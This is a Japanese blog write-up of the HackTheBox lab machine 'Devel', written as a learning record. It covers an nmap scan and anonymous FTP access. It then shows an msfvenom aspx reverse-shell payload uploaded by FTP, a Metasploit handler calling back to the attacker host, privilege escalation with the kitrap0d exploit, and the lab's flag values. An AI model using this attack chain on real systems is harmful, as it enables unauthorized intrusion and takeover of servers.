HackTheBox WriteUp:Devel

HackTheBoxの攻略対象3つ目
前回に引き続きWindowsマシンでしたが、ぶっちゃけ実力不足過ぎてほとんど進めることができませんでした
そのため、ほとんどは以下のWalkthroughを参考に進めました
https://www.freecodecamp.org/news/keep-calm-and-hack-the-box-devel/

そのうち、自力でこういうマシンくらいなら解けるようになるのかな・・・

1.探索
今回も、いつものようにnmapから始めた

kali@kali:~/SyachinekoLab/workspace/HTB/Devel$ sudo nmap -sS -sV -A -p 0-20000 --script vuln -T5 10.10.10.5
Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-19 21:14 EDT
Pre-scan script results:
| broadcast-avahi-dos: 
|   Discovered hosts:
|     224.0.0.251
|   After NULL UDP avahi packet DoS (CVE-2011-1002).
|_  Hosts are all up (not vulnerable).
Nmap scan report for 10.10.10.5
Host is up (0.34s latency).
Not shown: 19999 filtered ports
PORT   STATE SERVICE VERSION
21/tcp open  ftp     Microsoft ftpd
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_sslv2-drown: 
80/tcp open  http    Microsoft IIS httpd 7.5
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-server-header: Microsoft-IIS/7.5
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|phone|specialized
Running (JUST GUESSING): Microsoft Windows 8|Phone|2008|7|8.1|Vista|2012 (92%)
OS CPE: cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_7 cpe:/o:microsoft:windows_8.1 cpe:/o:microsoft:windows_vista::- cpe:/o:microsoft:windows_vista::sp1 cpe:/o:microsoft:windows_server_2012
Aggressive OS guesses: Microsoft Windows 8.1 Update 1 (92%), Microsoft Windows Phone 7.5 or 8.0 (92%), Microsoft Windows 7 or Windows Server 2008 R2 (91%), Microsoft Windows Server 2008 R2 (91%), Microsoft Windows Server 2008 R2 or Windows 8.1 (91%), Microsoft Windows Server 2008 R2 SP1 or Windows 8 (91%), Microsoft Windows 7 (91%), Microsoft Windows 7 Professional or Windows 8 (91%), Microsoft Windows 7 SP1 or Windows Server 2008 R2 (91%), Microsoft Windows Vista SP0 or SP1, Windows Server 2008 SP1, or Windows 7 (91%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

TRACEROUTE (using port 21/tcp)
HOP RTT       ADDRESS
1   139.20 ms 10.10.14.1
2   365.20 ms 10.10.10.5

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 737.76 seconds

確認できたサービスは2つ
21/TCP FTP
80/TCP HTTP


また、HTTPサービスが立ち上がっているため、http://10.10.10.5にアクセスしたところ、
以下サイトが表示された
f:id:syachineko:20200626222742p:plain


2.侵入
確認できたサービスに対して、侵入を試みた

FTPについて、簡単なユーザ等で接続が可能か試してみた

kali@kali:~/SyachinekoLab/workspace/HTB/Devel$ ftp 10.10.10.5
Connected to 10.10.10.5.
220 Microsoft FTP Service
Name (10.10.10.5:kali): ftp
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> ls
200 PORT command successful.
125 Data connection already open; Transfer starting.
03-18-17  02:06AM       <DIR>          aspnet_client
03-17-17  05:37PM                  689 iisstart.htm
03-17-17  05:37PM               184946 welcome.png
226 Transfer complete.
ftp> 


kali@kali:~/SyachinekoLab/workspace/HTB/Devel$ ftp 10.10.10.5
Connected to 10.10.10.5.
220 Microsoft FTP Service
Name (10.10.10.5:kali): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> ls
200 PORT command successful.
125 Data connection already open; Transfer starting.
03-18-17  02:06AM       <DIR>          aspnet_client
03-17-17  05:37PM                  689 iisstart.htm
03-17-17  05:37PM               184946 welcome.png
226 Transfer complete.
ftp> 

結果、ftp/ftpの組み合わせでログインに成功した
また、annonimousによるログインも成功した

Webサーバが立ち上がっていることもあり、
FTPとの組み合わせによるリバースシェルを仕掛けることとした

リバースシェルに用いるためのペイロードは、
msfvenomを用いて作成した

kali@kali:~/SyachinekoLab/workspace/HTB/Devel$ msfvenom -p windows/meterpreter/reverse_tcp -f aspx -o devel.aspx LHOST=10.10.14.9 LPORT=1234
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 341 bytes
Final size of aspx file: 2834 bytes
Saved as: devel.aspx

これをFTPでマシン側へ送った

kali@kali:~/SyachinekoLab/workspace/HTB/Devel$ ftp 10.10.10.5
Connected to 10.10.10.5.
220 Microsoft FTP Service
Name (10.10.10.5:kali): ftp
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> put devel.aspx
local: devel.aspx remote: devel.aspx
200 PORT command successful.
125 Data connection already open; Transfer starting.
226 Transfer complete.
2870 bytes sent in 0.00 secs (23.5952 MB/s)
ftp> ls
200 PORT command successful.
125 Data connection already open; Transfer starting.
03-18-17  02:06AM       <DIR>          aspnet_client
06-30-20  12:41AM                 2870 devel.aspx
03-17-17  05:37PM                  689 iisstart.htm
03-17-17  05:37PM               184946 welcome.png
226 Transfer complete.
ftp> 

その後、Metasploit側の操作にて、リバースシェルによる接続を確立した

kali@kali:~/SyachinekoLab/workspace/HTB/Devel$ msfconsole 
[!] The following modules were loaded with warnings:
[!]     /usr/share/metasploit-framework/modules/exploits/19671.rb
[!] Please see /home/kali/.msf4/logs/framework.log for details.
                                                  
     ,           ,
    /             \                                                                                                                                        
   ((__---,,,---__))                                                                                                                                       
      (_) O O (_)_________                                                                                                                                 
         \ _ /            |\                                                                                                                               
          o_o \   M S F   | \                                                                                                                              
               \   _____  |  *                                                                                                                             
                |||   WW|||                                                                                                                                
                |||     |||                                                                                                                                
                                                                                                                                                           

       =[ metasploit v5.0.85-dev                          ]
+ -- --=[ 2003 exploits - 1093 auxiliary - 342 post       ]
+ -- --=[ 560 payloads - 45 encoders - 10 nops            ]
+ -- --=[ 7 evasion                                       ]

Metasploit tip: Display the Framework log using the log command, learn more with help log

msf5 > use exploit/multi/handler 
msf5 exploit(multi/handler) > show options 

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target


msf5 exploit(multi/handler) > set payload 
Display all 519 possibilities? (y or n)
msf5 exploit(multi/handler) > set payload windows/meterpreter
set payload windows/meterpreter/bind_hidden_ipknock_tcp    set payload windows/meterpreter/reverse_nonx_tcp
set payload windows/meterpreter/bind_hidden_tcp            set payload windows/meterpreter/reverse_ord_tcp
set payload windows/meterpreter/bind_ipv6_tcp              set payload windows/meterpreter/reverse_tcp
set payload windows/meterpreter/bind_ipv6_tcp_uuid         set payload windows/meterpreter/reverse_tcp_allports
set payload windows/meterpreter/bind_named_pipe            set payload windows/meterpreter/reverse_tcp_dns
set payload windows/meterpreter/bind_nonx_tcp              set payload windows/meterpreter/reverse_tcp_rc4
set payload windows/meterpreter/bind_tcp                   set payload windows/meterpreter/reverse_tcp_rc4_dns
set payload windows/meterpreter/bind_tcp_rc4               set payload windows/meterpreter/reverse_tcp_uuid
set payload windows/meterpreter/bind_tcp_uuid              set payload windows/meterpreter/reverse_winhttp
set payload windows/meterpreter/reverse_hop_http           set payload windows/meterpreter/reverse_winhttps
set payload windows/meterpreter/reverse_http               set payload windows/meterpreter_bind_named_pipe
set payload windows/meterpreter/reverse_http_proxy_pstore  set payload windows/meterpreter_bind_tcp
set payload windows/meterpreter/reverse_https              set payload windows/meterpreter_reverse_http
set payload windows/meterpreter/reverse_https_proxy        set payload windows/meterpreter_reverse_https
set payload windows/meterpreter/reverse_ipv6_tcp           set payload windows/meterpreter_reverse_ipv6_tcp
set payload windows/meterpreter/reverse_named_pipe         set payload windows/meterpreter_reverse_tcp
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > show options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST                      yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target


msf5 exploit(multi/handler) > set LHOST 10.10.14.9
LHOST => 10.10.14.9
msf5 exploit(multi/handler) > set LPORT 1234
LPORT => 1234
msf5 exploit(multi/handler) > run

[*] Started reverse TCP handler on 10.10.14.9:1234 
[*] Sending stage (180291 bytes) to 10.10.10.5
[*] Meterpreter session 2 opened (10.10.14.9:1234 -> 10.10.10.5:49163) at 2020-06-26 09:56:55 -0400

meterpreter > 

なお、セッションを待っている状況で、
ブラウザ上からはhttp://10.10.10.5/devel.aspxにアクセスしてリバースシェルを確立している

以下コマンドによる確認を行ったが、有益な情報は得られなかった

meterpreter > search -f user.txt
No files matching your search were found.
meterpreter > shell
Process 3820 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

c:\windows\system32\inetsrv>systeminfo
systeminfo

Host Name:                 DEVEL
OS Name:                   Microsoft Windows 7 Enterprise 
OS Version:                6.1.7600 N/A Build 7600
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Standalone Workstation
OS Build Type:             Multiprocessor Free
Registered Owner:          babis
Registered Organization:   
Product ID:                55041-051-0948536-86302
Original Install Date:     17/3/2017, 4:17:31 ��
System Boot Time:          29/6/2020, 11:07:23 ��
System Manufacturer:       VMware, Inc.
System Model:              VMware Virtual Platform
System Type:               X86-based PC
Processor(s):              1 Processor(s) Installed.
                           [01]: x64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
BIOS Version:              Phoenix Technologies LTD 6.00, 12/12/2018
Windows Directory:         C:\Windows
System Directory:          C:\Windows\system32
Boot Device:               \Device\HarddiskVolume1
System Locale:             el;Greek
Input Locale:              en-us;English (United States)
Time Zone:                 (UTC+02:00) Athens, Bucharest, Istanbul
Total Physical Memory:     1.023 MB
Available Physical Memory: 688 MB
Virtual Memory: Max Size:  2.047 MB
Virtual Memory: Available: 1.525 MB
Virtual Memory: In Use:    522 MB
Page File Location(s):     C:\pagefile.sys
Domain:                    HTB
Logon Server:              N/A
Hotfix(s):                 N/A
Network Card(s):           1 NIC(s) Installed.
                           [01]: Intel(R) PRO/1000 MT Network Connection
                                 Connection Name: Local Area Connection
                                 DHCP Enabled:    No
                                 IP address(es)
                                 [01]: 10.10.10.5

c:\windows\system32\inetsrv>

3.権限昇格
Metasploitを用いて、権限昇格が可能かどうかを判別した

meterpreter > background
[*] Backgrounding session 1...
msf5 exploit(multi/handler) > use post/multi/recon/local_exploit_suggester
msf5 post(multi/recon/local_exploit_suggester) > show options

Module options (post/multi/recon/local_exploit_suggester):

   Name             Current Setting  Required  Description
   ----             ---------------  --------  -----------
   SESSION                           yes       The session to run this module on
   SHOWDESCRIPTION  false            yes       Displays a detailed description for the available exploits

msf5 post(multi/recon/local_exploit_suggester) > set session 1
session => 1
msf5 post(multi/recon/local_exploit_suggester) > run 

[*] 10.10.10.5 - Collecting local exploits for x86/windows...
[*] 10.10.10.5 - 30 exploit checks are being tried...
[+] 10.10.10.5 - exploit/windows/local/bypassuac_eventvwr: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms10_015_kitrap0d: The service is running, but could not be validated.
[+] 10.10.10.5 - exploit/windows/local/ms10_092_schelevator: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms13_053_schlamperei: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms13_081_track_popup_menu: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms14_058_track_popup_menu: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms15_004_tswbproxy: The service is running, but could not be validated.
[+] 10.10.10.5 - exploit/windows/local/ms15_051_client_copy_image: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms16_016_webdav: The service is running, but could not be validated.
[+] 10.10.10.5 - exploit/windows/local/ms16_075_reflection: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ppr_flatten_rec: The target appears to be vulnerable.
[*] Post module execution completed
msf5 post(multi/recon/local_exploit_suggester) > 

このうち、exploit/windows/local/ms10_015_kitrap0dを使用して権限昇格を行った

meterpreter > background
[*] Backgrounding session 3...
msf5 exploit(multi/handler) > show sessions

Active sessions
===============

  Id  Name  Type                     Information              Connection
  --  ----  ----                     -----------              ----------
  3         meterpreter x86/windows  IIS APPPOOL\Web @ DEVEL  10.10.14.9:1234 -> 10.10.10.5:49157 (10.10.10.5)

msf5 exploit(multi/handler) > use exploit/windows/local/ms10_015_kitrap0d
msf5 exploit(windows/local/ms10_015_kitrap0d) > show options

Module options (exploit/windows/local/ms10_015_kitrap0d):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION  2                yes       The session to run this module on.


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     10.10.14.9       yes       The listen address (an interface may be specified)
   LPORT     1234             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Windows 2K SP4 - Windows 7 (x86)


msf5 exploit(windows/local/ms10_015_kitrap0d) > set session 3
session => 3
msf5 exploit(windows/local/ms10_015_kitrap0d) > run

[*] Started reverse TCP handler on 10.10.14.9:1234 
[*] Launching notepad to host the exploit...
[+] Process 1672 launched.
[*] Reflectively injecting the exploit DLL into 1672...
[*] Injecting exploit into 1672 ...
[*] Exploit injected. Injecting payload into 1672...
[*] Payload injected. Executing exploit...
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Sending stage (180291 bytes) to 10.10.10.5
[*] Meterpreter session 4 opened (10.10.14.9:1234 -> 10.10.10.5:49158) at 2020-06-26 10:38:36 -0400

meterpreter > ls
Listing: c:\windows\system32\inetsrv
====================================

Mode              Size     Type  Last modified              Name
----              ----     ----  -------------              ----
100666/rw-rw-rw-  138752   fil   2009-07-13 20:11:35 -0400  AppHostNavigators.dll
100777/rwxrwxrwx  125440   fil   2009-07-13 20:10:51 -0400  InetMgr.exe
100666/rw-rw-rw-  126976   fil   2009-07-13 18:39:34 -0400  Microsoft.Web.Administration.dll
100666/rw-rw-rw-  1048576  fil   2009-07-13 18:39:42 -0400  Microsoft.Web.Management.dll
100666/rw-rw-rw-  137728   fil   2009-07-13 20:11:35 -0400  XPath.dll
100777/rwxrwxrwx  155648   fil   2009-07-13 20:11:25 -0400  appcmd.exe
100666/rw-rw-rw-  3654     fil   2009-06-10 17:17:16 -0400  appcmd.xml
100666/rw-rw-rw-  61440    fil   2009-07-13 20:11:12 -0400  apphostsvc.dll
100666/rw-rw-rw-  313856   fil   2009-07-13 20:11:17 -0400  appobj.dll
100666/rw-rw-rw-  389632   fil   2009-07-13 20:11:14 -0400  asp.dll
100666/rw-rw-rw-  22196    fil   2009-07-13 17:04:57 -0400  asp.mof
100777/rwxrwxrwx  195584   fil   2009-07-13 20:11:42 -0400  aspnetca.exe
100666/rw-rw-rw-  22528    fil   2009-07-13 20:10:58 -0400  asptlb.tlb
100666/rw-rw-rw-  32256    fil   2009-07-13 20:11:17 -0400  authanon.dll
100666/rw-rw-rw-  48640    fil   2009-07-13 20:11:01 -0400  browscap.dll
100666/rw-rw-rw-  33404    fil   2017-03-17 10:37:32 -0400  browscap.ini
100666/rw-rw-rw-  17408    fil   2009-07-13 20:11:22 -0400  cachfile.dll
100666/rw-rw-rw-  44544    fil   2009-07-13 20:11:28 -0400  cachhttp.dll
100666/rw-rw-rw-  10240    fil   2009-07-13 20:11:27 -0400  cachtokn.dll
100666/rw-rw-rw-  9728     fil   2009-07-13 20:11:27 -0400  cachuri.dll
100666/rw-rw-rw-  43520    fil   2009-07-13 20:11:22 -0400  compstat.dll
40777/rwxrwxrwx   4096     dir   2017-03-17 10:37:32 -0400  config
100666/rw-rw-rw-  41984    fil   2009-07-13 20:11:21 -0400  custerr.dll
100666/rw-rw-rw-  19456    fil   2009-07-13 20:11:22 -0400  defdoc.dll
100666/rw-rw-rw-  23552    fil   2009-07-13 20:11:22 -0400  dirlist.dll
40777/rwxrwxrwx   4096     dir   2017-03-17 10:37:32 -0400  en-US
100666/rw-rw-rw-  55808    fil   2009-07-13 20:11:24 -0400  filter.dll
100666/rw-rw-rw-  16384    fil   2009-07-13 20:11:29 -0400  ftpconfigext.dll
100666/rw-rw-rw-  9728     fil   2009-07-13 20:11:28 -0400  ftpctrlps.dll
100666/rw-rw-rw-  10240    fil   2009-07-13 20:11:29 -0400  ftpmib.dll
100666/rw-rw-rw-  14848    fil   2009-07-13 20:11:29 -0400  ftpres.dll
100666/rw-rw-rw-  308224   fil   2009-07-13 20:11:36 -0400  ftpsvc.dll
100666/rw-rw-rw-  69252    fil   2009-07-13 18:40:37 -0400  ftpsvc.mof
100666/rw-rw-rw-  27136    fil   2009-07-13 20:10:58 -0400  gzip.dll
100666/rw-rw-rw-  22528    fil   2009-07-13 20:11:09 -0400  httpmib.dll
100666/rw-rw-rw-  12800    fil   2009-07-13 20:11:17 -0400  hwebcore.dll
100666/rw-rw-rw-  63105    fil   2009-07-13 18:39:38 -0400  iis.msc
100666/rw-rw-rw-  197632   fil   2009-07-13 20:11:24 -0400  iiscore.dll
100666/rw-rw-rw-  89088    fil   2009-07-13 20:11:33 -0400  iisreg.dll
100666/rw-rw-rw-  12288    fil   2009-07-13 20:11:26 -0400  iisreqs.dll
100666/rw-rw-rw-  220160   fil   2009-07-13 20:11:11 -0400  iisres.dll
100777/rwxrwxrwx  30720    fil   2009-07-13 20:11:04 -0400  iisrstas.exe
100777/rwxrwxrwx  240128   fil   2009-07-13 20:11:45 -0400  iissetup.exe
100666/rw-rw-rw-  59904    fil   2009-07-13 20:11:36 -0400  iissyspr.dll
100666/rw-rw-rw-  205824   fil   2009-07-13 20:11:15 -0400  iisutil.dll
100666/rw-rw-rw-  396288   fil   2009-07-13 20:11:15 -0400  iisw3adm.dll
100666/rw-rw-rw-  106496   fil   2009-07-13 20:11:24 -0400  isapi.dll
100666/rw-rw-rw-  19456    fil   2009-07-13 20:11:23 -0400  loghttp.dll
100666/rw-rw-rw-  39424    fil   2009-07-13 20:11:26 -0400  modrqflt.dll
100666/rw-rw-rw-  363008   fil   2009-07-13 20:11:24 -0400  nativerd.dll
100666/rw-rw-rw-  19968    fil   2009-07-13 20:11:24 -0400  protsup.dll
100666/rw-rw-rw-  26624    fil   2009-07-13 20:11:11 -0400  rsca.dll
100666/rw-rw-rw-  49664    fil   2009-07-13 20:11:14 -0400  rscaext.dll
100666/rw-rw-rw-  37888    fil   2009-07-13 20:11:28 -0400  static.dll
100666/rw-rw-rw-  18944    fil   2009-07-13 20:11:22 -0400  validcfg.dll
100666/rw-rw-rw-  9216     fil   2009-07-13 20:11:07 -0400  w3ctrlps.dll
100666/rw-rw-rw-  30208    fil   2009-07-13 20:11:09 -0400  w3ctrs.dll
100666/rw-rw-rw-  24064    fil   2009-07-13 20:11:18 -0400  w3dt.dll
100666/rw-rw-rw-  15872    fil   2009-07-13 20:11:15 -0400  w3tp.dll
100777/rwxrwxrwx  20480    fil   2009-07-13 20:11:23 -0400  w3wp.exe
100666/rw-rw-rw-  55296    fil   2009-07-13 20:11:16 -0400  w3wphost.dll
100666/rw-rw-rw-  23552    fil   2009-07-13 20:11:13 -0400  wbhst_pm.dll
100666/rw-rw-rw-  24064    fil   2009-07-13 20:11:09 -0400  wbhstipm.dll

その後、user.txtおよびroot.txtを捜索し、発見した

meterpreter > cd /
meterpreter > ls
Listing: c:\
============

Mode                Size               Type  Last modified                    Name
----                ----               ----  -------------                    ----
40777/rwxrwxrwx     0                  dir   2009-07-13 22:36:15 -0400        $Recycle.Bin
40777/rwxrwxrwx     0                  dir   2009-07-14 00:53:55 -0400        Documents and Settings
40777/rwxrwxrwx     0                  dir   2009-07-13 22:37:05 -0400        PerfLogs
40555/r-xr-xr-x     4096               dir   2009-07-13 22:37:05 -0400        Program Files
40777/rwxrwxrwx     4096               dir   2009-07-13 22:37:05 -0400        ProgramData
40777/rwxrwxrwx     0                  dir   2017-03-17 10:17:30 -0400        Recovery
40777/rwxrwxrwx     8192               dir   2017-03-17 07:09:34 -0400        System Volume Information
40555/r-xr-xr-x     4096               dir   2009-07-13 22:37:05 -0400        Users
40777/rwxrwxrwx     16384              dir   2009-07-13 22:37:05 -0400        Windows
100777/rwxrwxrwx    24                 fil   2009-07-13 22:04:04 -0400        autoexec.bat
100666/rw-rw-rw-    10                 fil   2009-07-13 22:04:04 -0400        config.sys
40777/rwxrwxrwx     4096               dir   2017-03-17 10:37:31 -0400        inetpub
57211620/rw--w----  59948775560478703  fif   1908705379-07-18 19:36:16 -0500  pagefile.sys

meterpreter > cd Users 
lmeterpreter > ls
Listing: c:\Users
=================

Mode              Size  Type  Last modified              Name
----              ----  ----  -------------              ----
40777/rwxrwxrwx   8192  dir   2017-03-17 19:16:43 -0400  Administrator
40777/rwxrwxrwx   0     dir   2009-07-14 00:53:55 -0400  All Users
40777/rwxrwxrwx   8192  dir   2017-03-17 19:06:26 -0400  Classic .NET AppPool
40555/r-xr-xr-x   8192  dir   2009-07-13 22:37:05 -0400  Default
40777/rwxrwxrwx   0     dir   2009-07-14 00:53:55 -0400  Default User
40555/r-xr-xr-x   4096  dir   2009-07-13 22:37:05 -0400  Public
40777/rwxrwxrwx   8192  dir   2017-03-17 10:17:37 -0400  babis
100666/rw-rw-rw-  174   fil   2009-07-14 00:41:57 -0400  desktop.ini

meterpreter > cd babis 
lmeterpreter > ls
Listing: c:\Users\babis
=======================

Mode              Size    Type  Last modified              Name
----              ----    ----  -------------              ----
40777/rwxrwxrwx   0       dir   2017-03-17 10:17:40 -0400  AppData
40777/rwxrwxrwx   0       dir   2017-03-17 10:17:40 -0400  Application Data
40555/r-xr-xr-x   0       dir   2017-03-17 10:17:44 -0400  Contacts
40777/rwxrwxrwx   0       dir   2017-03-17 10:17:40 -0400  Cookies
40555/r-xr-xr-x   0       dir   2017-03-17 10:17:40 -0400  Desktop
40555/r-xr-xr-x   4096    dir   2017-03-17 10:17:40 -0400  Documents
40555/r-xr-xr-x   0       dir   2017-03-17 10:17:40 -0400  Downloads
40555/r-xr-xr-x   4096    dir   2017-03-17 10:17:40 -0400  Favorites
40555/r-xr-xr-x   0       dir   2017-03-17 10:17:40 -0400  Links
40777/rwxrwxrwx   0       dir   2017-03-17 10:17:40 -0400  Local Settings
40555/r-xr-xr-x   0       dir   2017-03-17 10:17:40 -0400  Music
40777/rwxrwxrwx   0       dir   2017-03-17 10:17:40 -0400  My Documents
100666/rw-rw-rw-  524288  fil   2017-03-17 10:17:40 -0400  NTUSER.DAT
100666/rw-rw-rw-  65536   fil   2017-03-17 10:17:40 -0400  NTUSER.DAT{6cced2f1-6e01-11de-8bed-001e0bcd1824}.TM.blf
100666/rw-rw-rw-  524288  fil   2017-03-17 10:17:40 -0400  NTUSER.DAT{6cced2f1-6e01-11de-8bed-001e0bcd1824}.TMContainer00000000000000000001.regtrans-ms
100666/rw-rw-rw-  524288  fil   2017-03-17 10:17:40 -0400  NTUSER.DAT{6cced2f1-6e01-11de-8bed-001e0bcd1824}.TMContainer00000000000000000002.regtrans-ms
40777/rwxrwxrwx   0       dir   2017-03-17 10:17:40 -0400  NetHood
40555/r-xr-xr-x   0       dir   2017-03-17 10:17:40 -0400  Pictures
40777/rwxrwxrwx   0       dir   2017-03-17 10:17:40 -0400  PrintHood
40777/rwxrwxrwx   0       dir   2017-03-17 10:17:40 -0400  Recent
40555/r-xr-xr-x   0       dir   2017-03-17 10:17:40 -0400  Saved Games
40555/r-xr-xr-x   0       dir   2017-03-17 10:17:52 -0400  Searches
40777/rwxrwxrwx   0       dir   2017-03-17 10:17:40 -0400  SendTo
40777/rwxrwxrwx   0       dir   2017-03-17 10:17:40 -0400  Start Menu
40777/rwxrwxrwx   0       dir   2017-03-17 10:17:40 -0400  Templates
40555/r-xr-xr-x   0       dir   2017-03-17 10:17:40 -0400  Videos
100666/rw-rw-rw-  262144  fil   2017-03-17 10:17:40 -0400  ntuser.dat.LOG1
100666/rw-rw-rw-  0       fil   2017-03-17 10:17:40 -0400  ntuser.dat.LOG2
100666/rw-rw-rw-  20      fil   2017-03-17 10:17:40 -0400  ntuser.ini

meterpreter > cd Desktop 
lsmeterpreter > ls
Listing: c:\Users\babis\Desktop
===============================

Mode              Size  Type  Last modified              Name
----              ----  ----  -------------              ----
100666/rw-rw-rw-  282   fil   2017-03-17 10:17:51 -0400  desktop.ini
100444/r--r--r--  32    fil   2017-03-17 19:14:21 -0400  user.txt.txt

meterpreter > cat user.txt.txt 
9ecdd6a3aedf24b41562fea70f4cb3e8meterpreter > cd ..
meterpreter > cd ..
meterpreter > ls
Listing: c:\Users
=================

Mode              Size  Type  Last modified              Name
----              ----  ----  -------------              ----
40777/rwxrwxrwx   8192  dir   2017-03-17 19:16:43 -0400  Administrator
40777/rwxrwxrwx   0     dir   2009-07-14 00:53:55 -0400  All Users
40777/rwxrwxrwx   8192  dir   2017-03-17 19:06:26 -0400  Classic .NET AppPool
40555/r-xr-xr-x   8192  dir   2009-07-13 22:37:05 -0400  Default
40777/rwxrwxrwx   0     dir   2009-07-14 00:53:55 -0400  Default User
40555/r-xr-xr-x   4096  dir   2009-07-13 22:37:05 -0400  Public
40777/rwxrwxrwx   8192  dir   2017-03-17 10:17:37 -0400  babis
100666/rw-rw-rw-  174   fil   2009-07-14 00:41:57 -0400  desktop.ini

meterpreter > cd Administrator 
cdmeterpreter > cd Desktop 
ls
meterpreter > ls
caListing: c:\Users\Administrator\Desktop
=======================================

Mode              Size  Type  Last modified              Name
----              ----  ----  -------------              ----
100666/rw-rw-rw-  282   fil   2017-03-17 19:16:53 -0400  desktop.ini
100444/r--r--r--  32    fil   2017-03-17 19:17:20 -0400  root.txt.txt

meterpreter > cat root.txt.txt 
e621a0b5041708797c4fc4728bc72b4bmeterpreter > 

多くの部分をWalkthroughに頼ってしまったが、
結果的には非常に学びが多かったので良かった


以上